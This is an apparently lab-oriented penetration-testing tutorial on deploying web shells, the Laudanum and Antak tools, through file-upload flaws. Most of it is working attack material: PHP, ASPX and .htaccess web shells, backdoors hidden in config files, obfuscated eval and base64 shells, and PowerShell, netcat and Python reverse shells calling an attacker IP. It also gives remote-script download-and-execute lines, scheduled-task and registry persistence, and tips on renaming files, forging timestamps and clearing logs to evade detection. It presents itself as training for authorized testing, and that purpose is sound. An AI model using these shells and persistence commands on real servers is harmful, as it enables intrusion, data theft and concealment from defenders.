🌐Web Shells

Overview

Web shells are server-side scripts that provide remote access to web servers through web browsers. They serve as a critical component in web application penetration testing, allowing attackers to execute commands, upload files, and maintain persistence on compromised web servers.

Why Web Shells Matter

Strategic Advantages:

• Browser-based access: No special client software required

• Firewall evasion: Traffic appears as normal HTTP/HTTPS

• Persistent access: Remains accessible through web interface

• Platform agnostic: Works across different operating systems

• Stealth operations: Blends with legitimate web traffic

Common Use Cases:

• Initial access: Gain foothold through file upload vulnerabilities

• Persistence: Maintain access after initial compromise

• Lateral movement: Pivot to other systems from web server

• Data exfiltration: Download sensitive files through web interface

• Command execution: Run system commands remotely

Introduction to Laudanum

What is Laudanum?

Laudanum is a comprehensive repository of ready-made web shell files designed for penetration testing and security assessments. It provides a collection of injectable files that can be used to:

• Receive reverse shell connections

• Execute commands directly from browser

• Upload and download files

• Enumerate system information

• Establish persistence on web servers

Supported Technologies

Laudanum includes web shells for multiple web application languages:

Language	Extension	Use Case
ASP	.asp	Classic ASP applications (IIS)
ASPX	.aspx	ASP.NET applications (IIS)
JSP	.jsp	Java Server Pages (Tomcat, WebLogic)
PHP	.php	PHP applications (Apache, Nginx)
CFML	.cfm	ColdFusion applications
Perl	.pl	Perl CGI scripts

Installation and Availability

Default Distributions:

• Kali Linux: Pre-installed in /usr/share/laudanum

• Parrot OS: Built-in by default

• Other Distributions: Manual installation required

Manual Installation:

# Clone from GitHub
git clone https://github.com/laudanum-shells/laudanum.git

# Or download specific release
wget https://github.com/laudanum-shells/laudanum/archive/master.zip

Working with Laudanum

File Locations

Default Path Structure:

/usr/share/laudanum/
├── asp/
│   ├── shell.asp
│   ├── cmd.asp
│   └── upload.asp
├── aspx/
│   ├── shell.aspx
│   ├── cmd.aspx
│   └── upload.aspx
├── jsp/
│   ├── shell.jsp
│   ├── cmd.jsp
│   └── upload.jsp
├── php/
│   ├── shell.php
│   ├── cmd.php
│   └── upload.php
└── cfm/
    └── shell.cfm

Preparation and Customization

Essential Modifications

Before deploying Laudanum shells, several modifications are typically required:

1. IP Address Configuration: Set attacking host IP for reverse connections

2. Remove Signatures: Delete ASCII art and obvious comments

3. Obfuscation: Modify variable names and structure

4. Authentication: Add password protection if needed

Basic Configuration Steps

Step 1: Copy for Modification

cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx

Step 2: Edit Configuration

nano /home/tester/demo.aspx
# or
vim /home/tester/demo.aspx

Step 3: Modify Allowed IPs

// Example from ASPX shell
string[] allowedIps = {"10.10.14.12", "127.0.0.1"};

Security Considerations

Operational Security:

• Remove identifying markers: ASCII art, author comments, default variables

• Customize appearance: Change interface styling and text

• Implement authentication: Add password or session-based protection

• Limit functionality: Remove unnecessary features to reduce detection risk

Detection Avoidance:

• Rename files: Use inconspicuous filenames

• Modify signatures: Change known strings and patterns

• Use legitimate directories: Place in expected locations

• Timestamp manipulation: Match file creation times

Practical Web Shell Deployment

Target Environment Setup

For demonstration purposes, we'll work with a web application that has file upload functionality.

Prerequisites:

• Target web application with upload capability

• Appropriate file type acceptance (ASP, ASPX, PHP, etc.)

• Web server write permissions

• Network connectivity for testing

Environment Configuration:

# Add to /etc/hosts for lab environment
echo "<target_ip> status.inlanefreight.local" >> /etc/hosts

Step-by-Step Deployment

Step 1: Shell Preparation

Copy Laudanum Shell:

cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx

Modify Configuration:

// Line 59 - Add your attacking IP
string[] allowedIps = {"10.10.14.12", "127.0.0.1"};

Recommended Modifications:

// Original (REMOVE)
/*
     Laudanum Project
     Copyright (C) 2006-2016 Kevin Johnson and the Laudanum team
     http://laudanum.inguardians.com/
     
     This program is free software; you can redistribute it and/or
     modify it under the terms of the GNU General Public License
     as published by the Free Software Foundation; either version 2
     of the License, or (at your option) any later version.
*/

// Remove ASCII art and obvious signatures
// Change variable names for obfuscation
// Modify interface styling

Step 2: File Upload Process

Locate Upload Functionality:

• Look for file upload forms on target application

• Identify upload directories and naming conventions

• Test file type restrictions and filtering

Upload the Shell:

1. Navigate to upload functionality

2. Select modified web shell file

3. Submit upload request

4. Note success message and file location

Example Upload Result:

File uploaded successfully to: \\files\demo.aspx

Step 3: Shell Access

Navigate to Uploaded Shell:

# Original path from upload response
status.inlanefreight.local\\files\demo.aspx

# Browser automatically converts to
status.inlanefreight.local//files/demo.aspx

Access Web Shell Interface:

• Open browser and navigate to shell location

• Verify shell loads correctly

• Test command execution functionality

Command Execution Examples

Basic System Information

Windows Commands:

systeminfo
whoami
hostname
ipconfig /all
tasklist
net user

Linux Commands:

uname -a
whoami
hostname
ifconfig
ps aux
cat /etc/passwd

File System Operations

Directory Listing:

# Windows
dir C:\
dir C:\Users\

# Linux
ls -la /
ls -la /home/

File Operations:

# Windows
type C:\Windows\System32\drivers\etc\hosts
copy file.txt C:\temp\

# Linux
cat /etc/hosts
cp file.txt /tmp/

Network Enumeration

Active Connections:

# Windows
netstat -an
arp -a
route print

# Linux
netstat -tulpn
arp -a
route -n

Advanced Web Shell Techniques

Shell Upgrade Strategies

From Web Shell to Reverse Shell

PowerShell Reverse Shell:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.12',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Netcat Reverse Shell (Linux):

nc -e /bin/bash 10.10.14.12 4444

Python Reverse Shell:

python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.12',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"

File Upload and Download

Upload Files via Web Shell:

• Use built-in upload functionality

• Transfer tools and payloads

• Upload privilege escalation exploits

Download Sensitive Files:

# Windows
type C:\Users\Administrator\Desktop\flag.txt
copy "C:\Program Files\App\config.xml" C:\inetpub\wwwroot\files\

# Linux
cat /etc/shadow
cp /etc/passwd /var/www/html/

Web Shell Customization

Custom PHP Web Shell

Minimal PHP Shell:

<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
<html>
<body>
<form method="GET">
<input type="text" name="cmd" placeholder="Enter command">
<input type="submit" value="Execute">
</form>
</body>
</html>

Advanced PHP Shell with Features:

<?php
session_start();
$password = "test123";

if(!isset($_SESSION['authenticated']) && $_POST['pass'] != $password) {
    echo '<form method="POST"><input type="password" name="pass"><input type="submit" value="Login"></form>';
    exit;
}
$_SESSION['authenticated'] = true;

if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>
<html>
<body>
<form method="GET">
<input type="text" name="cmd" value="<?php echo $_REQUEST['cmd']; ?>">
<input type="submit" value="Execute">
</form>
</body>
</html>

Custom ASPX Web Shell

Basic ASPX Command Shell:

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
    void Page_Load(object sender, EventArgs e)
    {
        if (Request["cmd"] != null)
        {
            Process p = new Process();
            p.StartInfo.FileName = "cmd.exe";
            p.StartInfo.Arguments = "/c " + Request["cmd"];
            p.StartInfo.UseShellExecute = false;
            p.StartInfo.RedirectStandardOutput = true;
            p.Start();
            Response.Write("<pre>" + p.StandardOutput.ReadToEnd() + "</pre>");
        }
    }
</script>
<html>
<body>
<form>
<input type="text" name="cmd" />
<input type="submit" value="Execute" />
</form>
</body>
</html>

Persistence Techniques

Hidden Web Shells

Steganographic Embedding:

<?php
// Legitimate-looking code
function generateReport($data) {
    return array_sum($data) / count($data);
}

// Hidden functionality
if($_GET['debug'] == 'admin') {
    eval($_POST['code']);
}
?>

Configuration File Injection:

// Within existing config file
$config = array(
    'database' => 'localhost',
    'username' => 'dbuser'
);

// Hidden shell
if($_GET['maint']) { system($_GET['cmd']); }

.htaccess Shells

Apache .htaccess Shell:

AddType application/x-httpd-php .htaccess
# <?php system($_GET['cmd']); ?>

Detection and Evasion

Common Detection Methods

Signature-Based Detection:

• Known web shell signatures in files

• Suspicious function calls (system, exec, eval)

• Common web shell strings and patterns

• File upload monitoring

Behavioral Detection:

• Unusual command execution patterns

• Abnormal file access behaviors

• Suspicious network connections

• Process creation monitoring

Log Analysis:

• Web server access logs

• System command execution logs

• File modification timestamps

• Network connection logs

Evasion Techniques

Code Obfuscation

PHP Obfuscation:

<?php
$a = 'system';
$b = $_GET['cmd'];
$a($b);
?>

// Or using base64
<?php
eval(base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7'));
?>

Variable Function Calls:

<?php
$functions = array('system', 'exec', 'shell_exec');
$func = $functions[0];
$func($_GET['cmd']);
?>

Traffic Obfuscation

Encrypted Communication:

<?php
$key = 'secretkey';
$cmd = openssl_decrypt($_POST['data'], 'AES-256-CBC', $key);
system($cmd);
?>

Covert Channels:

<?php
// Command in cookie
if(isset($_COOKIE['session'])) {
    system(base64_decode($_COOKIE['session']));
}
?>

File System Evasion

Timestamp Manipulation:

# Match timestamps to legitimate files
touch -r /var/www/html/index.php /var/www/html/shell.php

Hidden Directories:

# Use hidden directories
mkdir /var/www/html/.config
cp shell.php /var/www/html/.config/update.php

Best Practices and Operational Security

Deployment Guidelines

1. Reconnaissance First

   • Identify web server technology

   • Determine supported file types

   • Map upload functionality

   • Test file restrictions

2. Shell Customization

   • Remove identifying signatures

   • Implement authentication

   • Customize appearance

   • Limit functionality as needed

3. Access Management

   • Use HTTPS when possible

   • Implement session management

   • Monitor access attempts

   • Plan for emergency removal

Security Considerations

1. Authorization Scope

   • Only deploy on authorized targets

   • Follow engagement rules

   • Document shell locations

   • Remove after testing completion

2. Operational Security

   • Use encrypted connections

   • Avoid suspicious commands

   • Monitor detection systems

   • Maintain access logs

3. Cleanup Procedures

   • Remove shells after use

   • Clear access logs if possible

   • Document artifacts created

   • Verify complete removal

Troubleshooting Common Issues

Upload Problems

File Type Restrictions:

# Try different extensions
shell.php -> shell.php.txt -> shell.txt
shell.aspx -> shell.txt -> shell.asp

Size Limitations:

# Create minimal shells
<?php system($_GET['c']); ?>

Content Filtering:

# Obfuscate suspicious strings
str_replace('system', 'sys'.'tem', $func);

Execution Issues

Permission Problems:

# Check file permissions
ls -la shell.php

# Set executable permissions
chmod +x shell.php

Path Issues:

# Use absolute paths
/bin/ls instead of ls
C:\Windows\System32\cmd.exe instead of cmd

Environment Variables:

# Set PATH if needed
export PATH=/usr/local/bin:/usr/bin:/bin

Legal and Ethical Considerations

Authorized Testing Only

Requirements:

• Written authorization for target systems

• Clear scope definition

• Agreed-upon testing methods

• Incident response procedures

Documentation:

• Record all shell deployments

• Document access times and activities

• Maintain evidence chain

• Prepare removal procedures

Responsible Disclosure

Best Practices:

• Remove shells immediately after testing

• Report vulnerabilities to stakeholders

• Provide remediation guidance

• Follow coordinated disclosure timelines

Antak Webshell

Introduction to ASPX

What is ASPX?

Active Server Page Extended (ASPX) is a file type/extension written for Microsoft's ASP.NET Framework. Key characteristics:

• Server-side technology: Runs on web servers with ASP.NET Framework

• Dynamic content generation: Web form pages generated for user input

• HTML conversion: Server-side information converted to HTML

• Windows integration: Native integration with Windows operating systems

How ASPX Works

Processing Flow:

1. User request: Browser requests ASPX page

2. Server processing: ASP.NET Framework processes server-side code

3. HTML generation: Dynamic content converted to HTML

4. Client response: HTML sent to user's browser

Security Implications:

• Code execution: Can execute server-side commands

• System interaction: Direct access to underlying Windows OS

• Framework integration: Leverages .NET Framework capabilities

Antak Webshell Overview

What is Antak?

Antak is a sophisticated web shell built in ASP.NET and included within the Nishang project. It provides:

• PowerShell integration: Native PowerShell command execution

• Advanced UI: PowerShell-themed interface

• Memory execution: Script execution in memory

• Command encoding: Built-in command obfuscation

Nishang Project Context

Nishang is an Offensive PowerShell toolset that provides:

• Comprehensive toolkit: Options for entire pentest lifecycle

• PowerShell focus: Windows-centric attack tools

• Multiple modules: Various attack and post-exploitation tools

• Active development: Regularly updated and maintained

Antak Features and Capabilities

Core Functionality

PowerShell Console Simulation:

• Native PowerShell: Full PowerShell command support

• Process isolation: Each command executes as new process

• Interactive interface: Console-like user experience

• Command history: Previous commands accessible

Advanced Features:

• File operations: Upload and download capabilities

• Script execution: Memory-based script execution

• Command encoding: Automatic command obfuscation

• SQL integration: Database query capabilities

• Configuration parsing: web.config file analysis

Technical Advantages

PowerShell Integration:

• Native Windows: Leverages built-in Windows capabilities

• Administrative tasks: Full administrative command access

• .NET Framework: Complete framework functionality

• Module support: PowerShell module loading

Security Features:

• Authentication: Built-in user/password protection

• Access control: Restricted access to authorized users

• Session management: Secure session handling

Working with Antak

File Location and Setup

Default Location:

/usr/share/nishang/Antak-WebShell/
├── antak.aspx          # Main web shell file
└── Readme.md          # Documentation

File Listing:

ls /usr/share/nishang/Antak-WebShell
antak.aspx  Readme.md

Preparation and Customization

Step 1: Copy for Modification

cp /usr/share/nishang/Antak-WebShell/antak.aspx /home/administrator/Upload.aspx

Step 2: Configure Authentication

// Line 14 - Modify credentials
if (Request.Form["userpassword"] == "htb-student" && Request.Form["password"] == "htb-student")
{
    // Original example
    if (Request.Form["userpassword"] == "Disclaimer" && Request.Form["password"] == "ForLegitUseOnly")
}

Step 3: Security Hardening

// Remove identifying information
/*
    Antak Webshell
    Author: nikhil_mitt
    http://www.labofapenetrationtester.com
*/

// Remove ASCII art and obvious signatures
// Change variable names for obfuscation
// Modify interface styling and text

Practical Antak Deployment

Environment Setup

Prerequisites:

• Windows server with ASP.NET Framework

• IIS web server running

• File upload capability on target application

• Network connectivity for testing

Lab Configuration:

# Add to /etc/hosts
echo "<target_ip> status.inlanefreight.local" >> /etc/hosts

Deployment Process

Step 1: Upload Modified Shell

1. Navigate to target application upload functionality

2. Select modified Upload.aspx file

3. Submit upload request

4. Note file location (typically \\files\ directory)

Step 2: Access Web Shell

# Navigate to uploaded shell
status.inlanefreight.local/files/upload.aspx

Step 3: Authentication

• Enter configured username and password

• Gain access to Antak interface

• Verify PowerShell functionality

Initial Shell Access

Login Interface:

Username: htb-student
Password: htb-student
[Login]

Welcome Message:

Welcome to Antak - A Webshell which utilizes PowerShell.
Use help for more details.
Use clear to clear the screen.

Antak Interface and Commands

User Interface Elements

Command Execution:

• Submit: Execute entered commands

• Browse: File system navigation

• Upload the File: File upload functionality

• Encode and Execute: Obfuscated command execution

• Download: File download capabilities

• Parse web.config: Configuration file analysis

• Execute SQL Query: Database interaction

Basic PowerShell Commands

System Information:

# Get system information
Get-ComputerInfo
systeminfo

# Current user context
whoami
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name

# PowerShell version
$PSVersionTable

File System Operations:

# Directory listing
Get-ChildItem C:\
ls C:\Users\

# File operations
Get-Content C:\Windows\System32\drivers\etc\hosts
Copy-Item file.txt C:\temp\

# Directory navigation
Set-Location C:\inetpub\wwwroot
cd C:\temp

Process Management:

# List processes
Get-Process
tasklist

# Service management
Get-Service
net start
net stop servicename

Advanced Features

File Upload/Download:

# Upload files via interface
# Use "Browse" and "Upload the File" buttons

# Download files
# Use "Download" button with file path

Script Execution:

# Execute scripts in memory
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12/script.ps1')

# Encoded execution
# Use "Encode and Execute" for obfuscation

SQL Query Execution:

-- Database interaction
SELECT * FROM users;
SELECT name FROM sys.databases;

Advanced Antak Techniques

Upgrading to Full Shell

PowerShell Reverse Shell:

# Execute through Antak interface
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.12',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()

Meterpreter Integration:

# Download and execute Meterpreter payload
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12/payload.ps1')

Persistence Through Antak

Scheduled Tasks:

# Create scheduled task for persistence
schtasks /create /tn "WindowsUpdate" /tr "powershell.exe -ep bypass -c 'IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.12/shell.ps1\")'" /sc daily /st 09:00

Registry Persistence:

# Add registry run key
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "WindowsUpdate" -Value "powershell.exe -ep bypass -c 'IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.12/shell.ps1\")'"

Antak vs. Laudanum Comparison

Feature	Antak	Laudanum
Technology	ASP.NET/PowerShell	Multiple (ASP, PHP, JSP)
Interface	PowerShell-themed UI	Basic command interface
Authentication	Built-in user/password	IP-based restrictions
Features	Advanced (SQL, encoding)	Basic command execution
Platform	Windows/.NET focused	Cross-platform
Learning Curve	Moderate	Easy
Obfuscation	Built-in encoding	Manual modification

Security and Operational Considerations

Detection Signatures

Common Signatures:

// Remove these identifying strings
"Antak"
"nikhil_mitt"
"labofapenetrationtester"
"Nishang"

Variable Obfuscation:

// Original
string userpassword = Request.Form["userpassword"];

// Obfuscated
string up = Request.Form["user"];
string pwd = Request.Form["pass"];

Evasion Techniques

Code Modification:

// Change function names
void ExecuteCommand() -> void ProcessRequest()
void DisplayResult() -> void ShowOutput()

// Modify HTML structure
<title>Antak</title> -> <title>Admin Panel</title>

Traffic Obfuscation:

# Use encoded commands through "Encode and Execute"
# Implement custom encryption for sensitive commands
# Use legitimate PowerShell modules when possible

Learning Resources

IPPSEC Video Resources

Recommended Learning:

• IPPSEC.rocks: Search engine for penetration testing concepts

• Keyword search: Search for "aspx" for related demonstrations

• Video timestamps: Direct links to relevant sections

• Practical examples: Real-world ASPX shell usage

Specific Recommendations:

• Cereal walkthrough: ASPX shell demonstration (1:17:00 - 1:20:00)

• File upload techniques: Various boxes showing upload methods

• ASPX enumeration: Gobuster and directory discovery

Hands-on Practice

Lab Scenarios:

1. File upload exploitation: Practice with various upload filters

2. ASPX shell customization: Modify and deploy custom shells

3. PowerShell integration: Leverage advanced PowerShell features

4. Persistence establishment: Use Antak for persistent access

Troubleshooting Antak

Common Issues

Authentication Problems:

// Verify credential configuration
if (Request.Form["userpassword"] == "correctuser" && Request.Form["password"] == "correctpass")

// Check for typos in variable names
// Ensure proper string matching

PowerShell Execution Issues:

# Check PowerShell execution policy
Get-ExecutionPolicy

# Verify .NET Framework version
[System.Environment]::Version

# Test basic PowerShell functionality
$PSVersionTable

File Upload Problems:

# Verify file extension acceptance
.aspx -> .txt -> .asp

# Check file size limitations
# Verify upload directory permissions

Performance Optimization

Memory Management:

# Clear variables after use
Remove-Variable -Name * -ErrorAction SilentlyContinue

# Garbage collection
[System.GC]::Collect()

Connection Stability:

// Implement connection timeouts
// Add error handling for network issues
// Use connection pooling for database operations

Conclusion

Web shells are powerful tools for maintaining access to web servers and executing remote commands through web interfaces. Both Laudanum and Antak provide comprehensive solutions for different scenarios:

Laudanum offers:

• Multi-platform support: ASP, ASPX, PHP, JSP, and more

• Simple deployment: Ready-to-use files with minimal modification

• Basic functionality: Command execution and file operations

• Wide compatibility: Works across different web technologies

Antak provides:

• PowerShell integration: Native Windows PowerShell capabilities

• Advanced features: Encoding, SQL queries, file operations

• User-friendly interface: PowerShell-themed web interface

• Built-in security: Authentication and session management

Key Takeaways:

• Multiple technologies: Support for various web platforms

• Customization required: Modify signatures and add authentication

• Stealth operations: Blend with legitimate web traffic

• Upgrade paths: Transition to more advanced shell types

• Detection awareness: Understand and evade security controls

• Responsible use: Deploy only on authorized targets

Success with web shells requires understanding target environments, proper customization, and careful operational security. Regular practice with different web technologies and deployment scenarios will improve proficiency and effectiveness in real-world penetration testing engagements. Both Laudanum and Antak serve as excellent starting points for developing advanced web shell capabilities.